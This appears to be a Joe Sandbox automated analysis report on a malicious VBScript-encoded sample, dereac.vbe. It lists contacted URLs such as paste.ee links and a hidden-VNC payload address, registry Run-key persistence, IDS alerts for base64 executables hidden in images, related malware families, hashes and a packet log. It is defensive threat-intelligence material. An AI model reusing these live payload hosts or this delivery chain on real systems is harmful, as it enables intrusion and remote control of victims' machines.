                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                https://go.microsoft.copowershell.exe, 00000002.00000002.2707547034.000002B3635AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://paste.ee/d/JZHbWntsvcswscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://winderswonders.com/JK/hvnc.txtpowershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://www.google.com;wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://analytics.paste.eewscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/pscore6powershell.exe, 00000002.00000002.2672856306.000002B34B56F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://paste.ee/d/JZHbWPhwscript.exe, 00000000.00000003.2078892658.000001680CCCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080287262.000001680CCD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079339248.000001680CCCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.google.comwscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://uploaddeimagens.com.brpowershell.exe, 00000004.00000002.2325661291.000001EA544B3000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://oneget.orgXpowershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://paste.ee/wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://analytics.paste.ee;wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2672856306.000002B34B5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2672856306.000002B34B5EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://secure.gravatar.comwscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://oneget.orgpowershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://winderswonders.compowershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://paste.ee:443/d/JZHbWuwscript.exe, 00000000.00000002.2080298338.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.84.67
                                              paste.eeUnited States
                                              13335CLOUDFLARENETUSfalse
                                              172.67.215.45
                                              uploaddeimagens.com.brUnited States
                                              13335CLOUDFLARENETUStrue
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1391738
                                              Start date and time:2024-02-13 21:13:04 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 31s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:dereac.vbe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.expl.evad.winVBE@11/8@3/2
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 2
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 4600 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: dereac.vbe
                                              TimeTypeDescription
                                              21:13:50API Interceptor2x Sleep call for process: wscript.exe modified
                                              21:13:51API Interceptor47x Sleep call for process: powershell.exe modified
                                              21:13:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbs
                                              21:14:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name.vbs
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.84.67P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/kmRFs
                                              comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • paste.ee/d/cJo7v
                                              RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/EgkAG
                                              87645345.vbsGet hashmaliciousXWormBrowse
                                              • paste.ee/d/IJGyf
                                              182763543.vbsGet hashmaliciousXWormBrowse
                                              • paste.ee/d/0kkOm
                                              PaymentEUR41000.xlsGet hashmaliciousRemcosBrowse
                                              • paste.ee/d/oVqcS
                                              RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbsGet hashmaliciousRemcosBrowse
                                              • paste.ee/d/6VwxD
                                              240202PIMXF24C.docx.docGet hashmaliciousRemcosBrowse
                                              • paste.ee/d/wPDYR
                                              Purchase Order202428 (1).xlsGet hashmaliciousRemcosBrowse
                                              • paste.ee/d/pQbyK
                                              Applicazione di pagamento.docx.docGet hashmaliciousRemcosBrowse
                                              • paste.ee/d/7tUhO
                                              172.67.215.45P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                    66432890.vbsGet hashmaliciousUnknownBrowse
                                                      1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                        751652433.vbsGet hashmaliciousXWormBrowse
                                                          PaymentEUR41000.xlsGet hashmaliciousRemcosBrowse
                                                            orden00878t9.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                              Purchase Order202428 (1).xlsGet hashmaliciousRemcosBrowse
                                                                CONSULTA DE PRECIOS DE CEPROMA.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  paste.eeName.vbsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.187.200
                                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                                  • 172.67.187.200
                                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.21.84.67
                                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                                  • 104.21.84.67
                                                                  screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                  • 172.67.187.200
                                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                                  • 172.67.187.200
                                                                  66432890.vbsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.187.200
                                                                  87645345.vbsGet hashmaliciousXWormBrowse
                                                                  • 104.21.84.67
                                                                  uploaddeimagens.com.brName.vbsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.45.138
                                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                                  • 104.21.45.138
                                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.21.45.138
                                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                                  • 172.67.215.45
                                                                  66432890.vbsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  87645345.vbsGet hashmaliciousXWormBrowse
                                                                  • 104.21.45.138
                                                                  1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.215.45
                                                                  751652433.vbsGet hashmaliciousXWormBrowse
                                                                  • 172.67.215.45
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSRemittance advice payment PC - ID 30781-20733-1691072900.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.2.184
                                                                  Name.vbsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.45.138
                                                                  comparendo24755693025simitverenlineacgbindata.exeGet hashmaliciousPureLog Stealer, Quasar, ThanosBrowse
                                                                  • 172.67.34.170
                                                                  https://cilkonlay.com/Get hashmaliciousUnknownBrowse
                                                                  • 172.67.207.141
                                                                  https://apiv2.kol.eco/builder-redirect?url=https://unlock-my-door.com.au/makek-wisfc6d/edc98-smill/jeiqjeiqjeiqjeiqjeiq/amFyZWQuY2hlc2xleUBtYnUuZWR1Get hashmaliciousUnknownBrowse
                                                                  • 172.67.200.246
                                                                  pdfcentral (1).exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.151.101
                                                                  pdfcentral.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.41.3
                                                                  Payroll- 2122024 .htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.24.14
                                                                  rooming list.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  https://ecv.microsoft.com/gsRXGbxrdEGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 104.21.30.251
                                                                  CLOUDFLARENETUSRemittance advice payment PC - ID 30781-20733-1691072900.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.2.184
                                                                  Name.vbsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.45.138
                                                                  comparendo24755693025simitverenlineacgbindata.exeGet hashmaliciousPureLog Stealer, Quasar, ThanosBrowse
                                                                  • 172.67.34.170
                                                                  https://cilkonlay.com/Get hashmaliciousUnknownBrowse
                                                                  • 172.67.207.141
                                                                  https://apiv2.kol.eco/builder-redirect?url=https://unlock-my-door.com.au/makek-wisfc6d/edc98-smill/jeiqjeiqjeiqjeiqjeiq/amFyZWQuY2hlc2xleUBtYnUuZWR1Get hashmaliciousUnknownBrowse
                                                                  • 172.67.200.246
                                                                  pdfcentral (1).exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.151.101
                                                                  pdfcentral.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.41.3
                                                                  Payroll- 2122024 .htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.24.14
                                                                  rooming list.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.12.205
                                                                  https://ecv.microsoft.com/gsRXGbxrdEGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 104.21.30.251
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eName.vbsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  pdfcentral (1).exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  pdfcentral.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  rooming list.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.215.45
                                                                  https://dentiland.com.mx/Message%20Centre/mc.phpGet hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.215.45
                                                                  RFQ202402 PDF.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.215.45
                                                                  https://onn2tech.com/Get hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  02-13-2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 172.67.215.45
                                                                  _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.45
                                                                  a0e9f5d64349fb13191bc781f81f42e1Name.vbsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  FW DOE-GSA Procurement Notice For Newton Crouch Company - IW8637892.msgGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.84.67
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.84.67
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.84.67
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.84.67
                                                                  reservas-8882229.ppamGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  file.exeGet hashmaliciousRedLine, RisePro StealerBrowse
                                                                  • 104.21.84.67
                                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                                  • 104.21.84.67
                                                                  Check Lists_01_TMP.xlsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.84.67
                                                                  No context
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):204074
                                                                  Entropy (8bit):5.16860231694857
                                                                  Encrypted:false
                                                                  SSDEEP:3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
                                                                  MD5:85CBF9B1A0E3D8FDA14A86535E0692D9
                                                                  SHA1:695EAA69C8766E01720DEC322064EE968812F264
                                                                  SHA-256:AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
                                                                  SHA-512:0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllul774/lL:NllUwt
                                                                  MD5:3BD40D4BDD7802424FE8F2DC2A41C196
                                                                  SHA1:88F355EA9D58C5A00B2EBB0DC3127C0C13052631
                                                                  SHA-256:FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
                                                                  SHA-512:67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:@...e................................................@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Entropy (8bit):3.4527969137371404
                                                                  TrID:
                                                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                  • MP3 audio (1001/1) 32.22%
                                                                  • Lumena CEL bitmap (63/63) 2.03%
                                                                  • Corel Photo Paint (41/41) 1.32%
                                                                  File name:dereac.vbe
                                                                  File size:2'860 bytes
                                                                  MD5:3d1704a957f700472678bc83d9d6abcb
                                                                  SHA1:493d07d67ae25cd468c23ed446341512aa5d8d83
                                                                  SHA256:8bbe9ce696b004ed6b45f992470d99e093c4d463c7d1bdc80d50f071ab164a85
                                                                  SHA512:80a28e49bb084d8e367f7e33b77142ecdda62f5d585da68d3676061c1687248f4c2e297eb2347f32f6dcb1efbfea45cc31766e7ea26b1b61c5ba315ab156e5b1
                                                                  SSDEEP:48:7lTWtR6UF05lnGz4XoUN7xYUhOzkLjg56WLukL9rnW5ATvFrUJdToqv9oxLv6Ffl:7lTQ6UF0tXdhF3WlNWKAhocoof8fY5
                                                                  TLSH:96515E026BE86B0DF6F357186BB460A60E6BBE56B539C24D1098098C4FF3B504C65FB3
                                                                  File Content Preview:..p.o.s.t.e. .=. . .(.I.n.t.(.(.c.y.p.a.r.i.s.s.o.-.p.a.g.a.m.e.n.t.o.+.1.).*.R.n.d.+.p.a.g.a.m.e.n.t.o.).).....d.i.m. .g.i.g.o.....g.i.g.o.=. .f.a.l.s.e.....S.e.t. .e.s.g.o.t.a.n.t.e. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u
                                                                  Icon Hash:68d69b8f86ab9a86
                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  172.67.215.45192.168.2.6443497012018856 02/13/24-21:13:54.637091TCP2018856ET TROJAN Windows executable base64 encoded44349701172.67.215.45192.168.2.6
                                                                  172.67.215.45192.168.2.6443497012049038 02/13/24-21:13:55.113335TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image44349701172.67.215.45192.168.2.6
                                                                  172.67.215.45192.168.2.6443497012047750 02/13/24-21:13:54.637091TCP2047750ET TROJAN Base64 Encoded MZ In Image44349701172.67.215.45192.168.2.6
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 13, 2024 21:13:49.799809933 CET4969980192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:49.916834116 CET8049699104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:49.916933060 CET4969980192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:49.917215109 CET4969980192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.034197092 CET8049699104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.108501911 CET8049699104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.108516932 CET8049699104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.108622074 CET4969980192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.110263109 CET4969980192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.111507893 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.111603975 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.111716986 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.114156008 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.114192009 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.374144077 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.374442101 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.378218889 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.378248930 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.378722906 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.429836988 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.474284887 CET49700443192.168.2.6104.21.84.67
                                                                  Feb 13, 2024 21:13:50.517904997 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776160002 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776288986 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776380062 CET44349700104.21.84.67192.168.2.6
                                                                  Feb 13, 2024 21:13:50.776444912 CET49700443192.168.2.6104.21.84.67
